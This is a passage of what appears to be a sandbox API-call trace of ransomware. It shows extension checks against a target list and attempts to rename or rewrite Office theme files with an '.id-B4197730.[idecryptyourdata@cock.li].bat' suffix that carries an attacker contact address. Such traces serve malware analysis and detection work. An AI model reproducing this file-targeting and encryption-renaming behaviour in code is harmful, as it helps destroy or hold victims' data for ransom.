[0175.167] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.167] lstrlenW (lpString=".pdf") returned 4 [0175.167] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString=".xls") returned 4 [0175.167] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString=".xlsx") returned 5 [0175.167] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.167] lstrlenW (lpString=".ppt") returned 4 [0175.167] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.167] lstrlenW (lpString=".zip") returned 4 [0175.167] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString=".rar") returned 4 [0175.167] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString=".bz2") returned 4 [0175.167] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString=".7z") returned 3 [0175.167] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.167] lstrlenW (lpString=".dbf") returned 4 [0175.167] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.167] lstrlenW (lpString=".1cd") returned 4 [0175.167] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.167] lstrlenW (lpString=".jpg") returned 4 [0175.168] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.168] lstrlenW (lpString=".doc") returned 4 [0175.168] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString=".docx") returned 5 [0175.168] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.168] lstrlenW (lpString=".pdf") returned 4 [0175.168] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString=".xls") returned 4 [0175.168] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString=".xlsx") returned 5 [0175.168] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.168] lstrlenW (lpString=".ppt") returned 4 [0175.168] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.168] lstrlenW (lpString=".zip") returned 4 [0175.168] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString=".rar") returned 4 [0175.168] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString=".bz2") returned 4 [0175.168] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.168] lstrlenW (lpString=".7z") returned 3 [0175.168] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.168] lstrlenW (lpString=".dbf") returned 4 [0175.168] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.169] lstrlenW (lpString=".1cd") returned 4 [0175.169] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx") returned 75 [0175.169] lstrlenW (lpString=".jpg") returned 4 [0175.169] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.169] lstrcmpiW (lpString1=".thmx", lpString2=".bat") returned 1 [0175.169] lstrlenW (lpString="Organic.thmx") returned 12 [0175.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.170] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=8705569) returned 1 [0175.170] CloseHandle (hObject=0x530) returned 1 [0175.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx")) returned 0x220 [0175.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0175.170] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.170] lstrlenW (lpString=".doc") returned 4 [0175.170] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString=".docx") returned 5 [0175.171] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.171] lstrlenW (lpString=".pdf") returned 4 [0175.171] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString=".xls") returned 4 [0175.171] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString=".xlsx") returned 5 [0175.171] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.171] lstrlenW (lpString=".ppt") returned 4 [0175.171] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.171] lstrlenW (lpString=".zip") returned 4 [0175.171] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString=".rar") returned 4 [0175.171] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString=".bz2") returned 4 [0175.171] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString=".7z") returned 3 [0175.171] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.171] lstrlenW (lpString=".dbf") returned 4 [0175.171] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.171] lstrlenW (lpString=".1cd") returned 4 [0175.171] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.171] lstrlenW (lpString=".jpg") returned 4 [0175.171] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.171] lstrlenW (lpString=".doc") returned 4 [0175.172] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString=".docx") returned 5 [0175.172] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.172] lstrlenW (lpString=".pdf") returned 4 [0175.172] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString=".xls") returned 4 [0175.172] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString=".xlsx") returned 5 [0175.172] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.172] lstrlenW (lpString=".ppt") returned 4 [0175.172] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.172] lstrlenW (lpString=".zip") returned 4 [0175.172] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString=".rar") returned 4 [0175.172] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString=".bz2") returned 4 [0175.172] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString=".7z") returned 3 [0175.172] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.172] lstrlenW (lpString=".dbf") returned 4 [0175.172] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.172] lstrlenW (lpString=".1cd") returned 4 [0175.172] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx") returned 70 [0175.172] lstrlenW (lpString=".jpg") returned 4 [0175.172] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.173] lstrcmpiW (lpString1=".thmx", lpString2=".bat") returned 1 [0175.174] lstrlenW (lpString="Retrospect.thmx") returned 15 [0175.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.174] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=1623260) returned 1 [0175.174] CloseHandle (hObject=0x530) returned 1 [0175.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx")) returned 0x220 [0175.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0175.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.175] lstrlenW (lpString=".doc") returned 4 [0175.175] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.175] lstrlenW (lpString=".docx") returned 5 [0175.175] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.175] lstrlenW (lpString=".pdf") returned 4 [0175.175] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.175] lstrlenW (lpString=".xls") returned 4 [0175.175] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.175] lstrlenW (lpString=".xlsx") returned 5 [0175.175] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.175] lstrlenW (lpString=".ppt") returned 4 [0175.175] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.176] lstrlenW (lpString=".zip") returned 4 [0175.176] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString=".rar") returned 4 [0175.176] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString=".bz2") returned 4 [0175.176] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString=".7z") returned 3 [0175.176] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.176] lstrlenW (lpString=".dbf") returned 4 [0175.176] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.176] lstrlenW (lpString=".1cd") returned 4 [0175.176] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.176] lstrlenW (lpString=".jpg") returned 4 [0175.176] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.176] lstrlenW (lpString=".doc") returned 4 [0175.176] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString=".docx") returned 5 [0175.176] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.176] lstrlenW (lpString=".pdf") returned 4 [0175.176] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.176] lstrlenW (lpString=".xls") returned 4 [0175.177] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString=".xlsx") returned 5 [0175.177] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.177] lstrlenW (lpString=".ppt") returned 4 [0175.177] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.177] lstrlenW (lpString=".zip") returned 4 [0175.177] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString=".rar") returned 4 [0175.177] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString=".bz2") returned 4 [0175.177] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString=".7z") returned 3 [0175.177] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.177] lstrlenW (lpString=".dbf") returned 4 [0175.177] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.177] lstrlenW (lpString=".1cd") returned 4 [0175.177] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx") returned 73 [0175.177] lstrlenW (lpString=".jpg") returned 4 [0175.177] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.177] lstrcmpiW (lpString1=".thmx", lpString2=".bat") returned 1 [0175.178] lstrlenW (lpString="Slice.thmx") returned 10 [0175.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.179] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=864810) returned 1 [0175.179] CloseHandle (hObject=0x530) returned 1 [0175.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx")) returned 0x220 [0175.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0175.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.179] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.179] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.180] CloseHandle (hObject=0x530) returned 1 [0175.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.180] lstrlenW (lpString=".doc") returned 4 [0175.180] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.180] lstrlenW (lpString=".docx") returned 5 [0175.180] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.180] lstrlenW (lpString=".pdf") returned 4 [0175.180] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.180] lstrlenW (lpString=".xls") returned 4 [0175.180] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.180] lstrlenW (lpString=".xlsx") returned 5 [0175.180] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.180] lstrlenW (lpString=".ppt") returned 4 [0175.180] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.180] lstrlenW (lpString=".zip") returned 4 [0175.181] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString=".rar") returned 4 [0175.181] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString=".bz2") returned 4 [0175.181] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString=".7z") returned 3 [0175.181] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.181] lstrlenW (lpString=".dbf") returned 4 [0175.181] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.181] lstrlenW (lpString=".1cd") returned 4 [0175.181] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.181] lstrlenW (lpString=".jpg") returned 4 [0175.181] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.181] lstrlenW (lpString=".doc") returned 4 [0175.181] lstrcmpiW (lpString1=".doc", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString=".docx") returned 5 [0175.181] lstrcmpiW (lpString1=".docx", lpString2=".thmx") returned -1 [0175.181] lstrlenW (lpString=".pdf") returned 4 [0175.181] lstrcmpiW (lpString1=".pdf", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString=".xls") returned 4 [0175.181] lstrcmpiW (lpString1=".xls", lpString2="thmx") returned -1 [0175.181] lstrlenW (lpString=".xlsx") returned 5 [0175.182] lstrcmpiW (lpString1=".xlsx", lpString2=".thmx") returned 1 [0175.182] lstrlenW (lpString=".ppt") returned 4 [0175.182] lstrcmpiW (lpString1=".ppt", lpString2="thmx") returned -1 [0175.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.182] lstrlenW (lpString=".zip") returned 4 [0175.182] lstrcmpiW (lpString1=".zip", lpString2="thmx") returned -1 [0175.182] lstrlenW (lpString=".rar") returned 4 [0175.182] lstrcmpiW (lpString1=".rar", lpString2="thmx") returned -1 [0175.182] lstrlenW (lpString=".bz2") returned 4 [0175.182] lstrcmpiW (lpString1=".bz2", lpString2="thmx") returned -1 [0175.182] lstrlenW (lpString=".7z") returned 3 [0175.182] lstrcmpiW (lpString1=".7z", lpString2="hmx") returned -1 [0175.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.182] lstrlenW (lpString=".dbf") returned 4 [0175.182] lstrcmpiW (lpString1=".dbf", lpString2="thmx") returned -1 [0175.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.182] lstrlenW (lpString=".1cd") returned 4 [0175.182] lstrcmpiW (lpString1=".1cd", lpString2="thmx") returned -1 [0175.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx") returned 68 [0175.182] lstrlenW (lpString=".jpg") returned 4 [0175.182] lstrcmpiW (lpString1=".jpg", lpString2="thmx") returned -1 [0175.182] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0175.182] lstrlenW (lpString="Aspect.xml") returned 10 [0175.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.186] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=740) returned 1 [0175.186] CloseHandle (hObject=0x530) returned 1 [0175.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml")) returned 0x220 [0175.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0175.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0175.186] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.187] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0175.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\aspect.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.187] CloseHandle (hObject=0x530) returned 1 [0175.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.187] lstrlenW (lpString=".doc") returned 4 [0175.187] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0175.187] lstrlenW (lpString=".docx") returned 5 [0175.187] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0175.187] lstrlenW (lpString=".pdf") returned 4 [0175.187] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0175.187] lstrlenW (lpString=".xls") returned 4 [0175.187] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0175.187] lstrlenW (lpString=".xlsx") returned 5 [0175.187] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0175.187] lstrlenW (lpString=".ppt") returned 4 [0175.187] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0175.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.187] lstrlenW (lpString=".zip") returned 4 [0175.188] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0175.188] lstrlenW (lpString=".rar") returned 4 [0175.188] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0175.188] lstrlenW (lpString=".bz2") returned 4 [0175.188] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0175.188] lstrlenW (lpString=".7z") returned 3 [0175.188] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0175.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.188] lstrlenW (lpString=".dbf") returned 4 [0175.188] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0175.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Aspect.xml") returned 81 [0175.188] lstrlenW (lpString=".1cd") returned 4 [0175.188] lstrcmpiW (lpString1=".1cd", 